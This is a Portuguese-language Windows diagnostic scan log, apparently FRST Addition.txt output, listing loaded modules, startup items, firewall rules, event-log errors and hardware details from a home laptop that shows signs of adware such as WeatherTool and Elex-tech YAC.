2016-05-30 03:30 - 2016-05-30 03:30 - 01049712 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\WeatherEntryDll.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2016-10-28 14:54 - 2016-09-07 01:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-17 10:30 - 2017-03-04 03:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-17 10:31 - 2017-03-04 03:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-17 10:31 - 2017-03-04 03:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-17 10:31 - 2017-03-04 03:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-04-12 00:42 - 2017-03-28 02:07 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-04-12 00:42 - 2017-03-28 02:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-12 00:43 - 2017-03-28 02:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-10 10:39 - 2017-04-10 10:39 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 42507264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 02334184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\skypert.dll
2014-01-26 19:09 - 2014-07-11 11:02 - 00127688 _____ () C:\Program Files (x86)\PSafe\CrashLib.dll
2016-12-24 00:30 - 2016-12-24 00:30 - 00574152 _____ () C:\Program Files (x86)\vSnapshot\1.0.0.0\Updata.dll
2016-05-30 03:21 - 2016-05-30 03:21 - 00543344 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPTask.dll
2016-05-30 03:20 - 2016-05-30 03:20 - 00406640 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPNet.dll
2016-05-30 03:19 - 2016-05-30 03:19 - 00428656 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPDR.dll
2017-04-17 19:11 - 2017-04-17 00:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
2015-03-16 11:28 - 2015-03-16 11:28 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2015-06-24 01:07 - 2015-06-24 01:07 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2017-04-25 09:28 - 2016-05-22 23:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
2017-04-25 09:28 - 2016-05-22 23:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
2015-02-26 14:07 - 2015-02-09 13:14 - 01905904 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2013-10-08 04:15 - 2012-11-25 23:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-02-26 14:07 - 2014-02-18 16:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)


==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)


==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\itau.com.br -> bankline.itau.com.br

==================== Hosts Conteúdo: ===============================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2013-08-22 10:25 - 2017-04-13 11:38 - 00000822 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img2.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

MSCONFIG\Services: AERTFilters => 2
MSCONFIG\Services: OrolixDeviceMonitor => 2
HKLM\...\StartupApproved\Run: => "SynTPEnh"
HKLM\...\StartupApproved\Run: => "DellWPF"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => "RtHDVBg"
HKLM\...\StartupApproved\Run: => "BtvStack"
HKLM\...\StartupApproved\Run: => "QuickSet"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "RemoteControl10"
HKLM\...\StartupApproved\Run32: => "PSafeAV"
HKLM\...\StartupApproved\Run32: => "PSafeTray"
HKLM\...\StartupApproved\Run32: => "PSafeWDS"
HKLM\...\StartupApproved\Run32: => "BAV mini setup"
HKLM\...\StartupApproved\Run32: => "Diebold - Warsaw"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Enviar para o OneNote.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Adobe Playpanel.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Microsoft SharePoint Workspace.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "BackgroundContainer"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Facebook Update"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "OfficeSyncProcess"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_75BD889C5F695DD03545732E9F8A7932"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "VDownloader"

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [TCP Query User{ABC00D73-4436-4CCF-B22B-4BCD66CF82F2}C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{FCDC5A0A-6DCA-4712-B272-0A7578E11F06}C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{18C3FE74-FDE4-42DE-8156-E1A733EA7C0E}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{16D067DB-6231-47FD-A3CB-8629B61E3B60}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{6B446C8A-9266-46AB-85A6-E92C5974B43E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{262684D5-BC5E-4F5C-8F2E-98E50A972023}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{3608EEA0-8AA6-4702-9D10-A82439A2F0C4}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{3C12E942-8ABC-4F4B-AECE-95427827D42A}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{EBA14474-EF63-41DF-85B8-97647663D51D}] => (Allow) C:\Users\ADEMIR MONTEIRO\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [TCP Query User{913B2E14-C0BF-4700-A055-033DFD3AD27C}C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [UDP Query User{60121106-2C58-4E36-A679-AF2E6DB3288E}C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [TCP Query User{EE018A31-18C0-4E06-A18E-3F0B8E9FC092}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [UDP Query User{C8AF1857-9645-4672-AD85-3340E2EC4519}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [{84F9CA59-9F31-4EBB-95E5-2911621BCED1}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{ACA1BE0D-6002-4FE3-BC36-1CF4AFB452DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2F741DD0-F787-409E-A9D6-5CC26B96E1B6}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{63A99386-ABB8-4DE5-B464-8682581FB0CB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{E82E9915-0DCD-42E5-B864-B4538715A49C}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{AA08E42F-D4F0-463E-9AE2-5CF14818877E}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s317j90d848001848001.dat
FirewallRules: [{2720CE7D-3BA2-4F9D-9A26-82C988FE6B68}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s317j90d848001848001.dat

==================== Pontos de Restauração =========================

17-04-2017 20:17:30 Ponto de Verificação Agendado
21-04-2017 18:36:14 Windows Update

==================== Dispositivos Apresentando Falhas No Gerenciador =============


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (04/25/2017 06:11:31 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/25/2017 05:39:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/25/2017 11:37:34 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/25/2017 11:07:34 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/25/2017 10:37:35 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/25/2017 10:35:11 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.

ID do Processo: 2cd4

Hora de Início: 01d2bdc88b791a52

Hora de Término: 29

Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

ID do Relatório: ff16f1e8-29bb-11e7-bfec-3c77e6d2e70c

Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe

ID do aplicativo relativo ao pacote com falha: MicrosoftEdge

Error: (04/25/2017 10:33:37 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.

ID do Processo: 311c

Hora de Início: 01d2bdc7c7975bfc

Hora de Término: 16

Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

ID do Relatório: c733f1e3-29bb-11e7-bfec-3c77e6d2e70c

Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe

ID do aplicativo relativo ao pacote com falha: MicrosoftEdge

Error: (04/25/2017 10:28:42 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..

Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.

System Error:
Acesso negado.
.

Error: (04/25/2017 10:28:09 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.

ID do Processo: 2ae0

Hora de Início: 01d2bdc77aa205ae

Hora de Término: 16

Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

ID do Relatório: 03465e69-29bb-11e7-bfec-3c77e6d2e70c

Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe

ID do aplicativo relativo ao pacote com falha: MicrosoftEdge

Error: (04/25/2017 10:26:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: microsoftedgecp.exe, versão: 11.0.14393.953, carimbo de data/hora: 0x58ba5911
Nome do módulo com falha: ntdll.dll, versão: 10.0.14393.479, carimbo de data/hora: 0x5825887f
Código de exceção: 0xc0000005
Deslocamento da falha: 0x000000000004acbd
ID do processo com falha: 0x1458
Hora de início do aplicativo com falha: 0x01d2bdbff0d1b88d
Caminho do aplicativo com falha: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe
Caminho do módulo com falha: C:\WINDOWS\SYSTEM32\ntdll.dll
ID do Relatório: d4671552-07f5-416c-a38f-48b46ee20781
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge


Erros de Sistema:
=============
Error: (04/25/2017 05:39:20 PM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.

Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.

Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.

Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.

Error: (04/25/2017 12:01:32 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.

Error: (04/25/2017 10:26:05 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
e APPID
{7006698D-2974-4091-A424-85DD0B909E23}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.

Error: (04/25/2017 09:28:54 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço YAC Kit Driver devido ao seguinte erro:
Não há suporte para o pedido.

Error: (04/25/2017 09:24:48 AM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.

Error: (04/25/2017 09:23:55 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Serviço Windows Defender foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 100 milissegundos: Executar o programa de recuperação configurado.

Error: (04/25/2017 09:21:49 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.


CodeIntegrity:
===================================
Date: 2017-04-25 18:23:46.685
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 18:11:29.504
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 18:02:38.867
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 17:36:00.602
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 11:52:34.913
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 11:32:52.865
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 11:22:34.801
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 10:58:23.657
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 10:52:34.784
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

Date: 2017-04-25 10:37:35.301
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i3-3217U CPU @ 1.80GHz
Percentagem de memória em uso: 63%
RAM física total: 3961.09 MB
RAM física disponível: 1437.06 MB
Virtual Total: 5981.75 MB
Virtual disponível: 2611.1 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:687.44 GB) (Free:488.82 GB) NTFS
Drive e: (PBR Image) (Fixed) (Total:9.62 GB) (Free:0.72 GB) NTFS
Drive f: (ESP) (Fixed) (Total:0.48 GB) (Free:0.44 GB) FAT32

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 33DB2EEA)

Partition: GPT.

==================== Fim de Addition.txt ============================
